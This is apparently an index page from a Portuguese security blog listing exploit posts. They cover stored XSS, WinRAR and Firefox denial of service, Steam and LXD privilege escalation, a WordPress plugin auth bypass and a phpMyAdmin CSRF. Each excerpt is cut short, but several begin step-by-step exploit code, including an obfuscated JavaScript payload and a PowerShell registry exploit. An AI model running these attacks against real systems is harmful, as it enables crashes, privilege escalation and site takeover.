Vulnerabilidades

XSS Armazenado em Site de Empregos - Bug Bounty PoC 7

XSS Armazenado em Site de Empregos – Bug Bounty PoC

E ai pessoal, tudo bem com vocês? Hoje eu trouxe uma prova de conceito de um bug bounty que realizei há alguns meses atrás, trata-se de um Cross-Site Scripting (XSS) Armazenado em um site de empregos. O site possibilita o envio do nosso currículo em PDF, armazenando em nosso perfil e criando uma página para acessar …

XSS Armazenado em Site de Empregos – Bug Bounty PoC Leia mais »

DoS no WinRAR

DoS no WinRAR

Fala pessoal, tudo bem com vocês? Hoje trago um exploit de negação de serviço direcionado a uma falha do WinRAR 5.80 64bits. 1 – Crie um arquivo html com o seguinte código: <script type=”text/javascript”> //<![CDATA[ <!– var x=”function f(x){var i,o=\”\”,l=x.length;for(i=l-1;i>=0;i–) {try{o+=x.c” + “harAt(i);}catch(e){}}return o;}f(\”)\\\”function f(x,y){var i,o=\\\”\\\\\\\””+ “\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod” + “e(x.charCodeAt(i)^(y++));}return o;}f(\\\”\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\”+ “\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh” + “83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\”+ “\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\”+ “\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02” …

DoS no WinRAR Leia mais »

Exploit Escalação de Privilégios na Steam

Exploit: Escalação de Privilégios na Steam

A plataforma de jogos Steam, desenvolvida pela empresa Valve, apresenta uma vulnerabilidade de 0-day na versão para Windows. A falha, que se tornou pública pelo pesquisador Vasily Kravets, permite que qualquer usuário execute código arbitrário com privilégios de administrador. O exploit foi desenvolvido em PowerShell. $SteamRegKey = “HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS” $MSIRegKey = “HKLM:\SYSTEM\CurrentControlSet\Services\msiserver” $RegDir = “C:\Windows\Temp\RegLN.exe” $PayDir …

Exploit: Escalação de Privilégios na Steam Leia mais »

Escalação de Privilégio no LXD Ubuntu 18.04

Escalação de Privilégio no LXD Ubuntu 18.04

No dia 10 de Junho de 2019 foi descoberta uma falha onde é possível fazer uma escalação de privilégio no LXD Ubuntu 18.04. No computador do atacante, faça download da build-alpine e crie um container como usuário root wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine Agora execute este script e você terá acesso root na maquina da vitima #!/usr/bin/env bash function …

Escalação de Privilégio no LXD Ubuntu 18.04 Leia mais »

Bypass na Autenticação do Wordpress Plugin Like Button

Bypass na Autenticação do WordPress Plugin Like Button

O plugin WP Like Button permite que você adicione os botões do Facebook, como curtir, compartilhar e adicionar. A versão 1.0.6 do WP Like Button está vulnerável, permitindo que um usuário não autenticado consiga atualizar com êxito as configurações do plug-in. Por exemplo, o comando curl abaixo permite que um invasor altere o parâmetro each_page_url para https://hijack.com, isso …

Bypass na Autenticação do WordPress Plugin Like Button Leia mais »

CSRF no phpMyAdmin

CSRF no phpMyAdmin

Um problema foi descoberto no phpMyAdmin em versões anteriores à 4.9.0. Foi encontrada uma vulnerabilidade que permite que um invasor dispare um ataque CSRF contra um usuário do phpMyAdmin. O invasor pode enganar o usuário, por exemplo, por meio de uma tag <img> quebrada apontando para o banco de dados phpMyAdmin da vítima, e o …

CSRF no phpMyAdmin Leia mais »

DoS no navegador Mozilla Firefox 67.0.4

DoS no navegador Mozilla Firefox 67.0.4

No dia 09 de Julho de 2019 foi descoberta uma falha de negação de serviço no navegador Mozilla Firefox 67.0.4. Se passar uma string enorme como um argumento para DOMParser.parseFromString irá travar a aba do navegador. Como explorar a falha no Firefox? Basta criar uma página em HTML com o seguinte código: <!DOCTYPE html> <head> <title> Loading …

DoS no navegador Mozilla Firefox 67.0.4 Leia mais »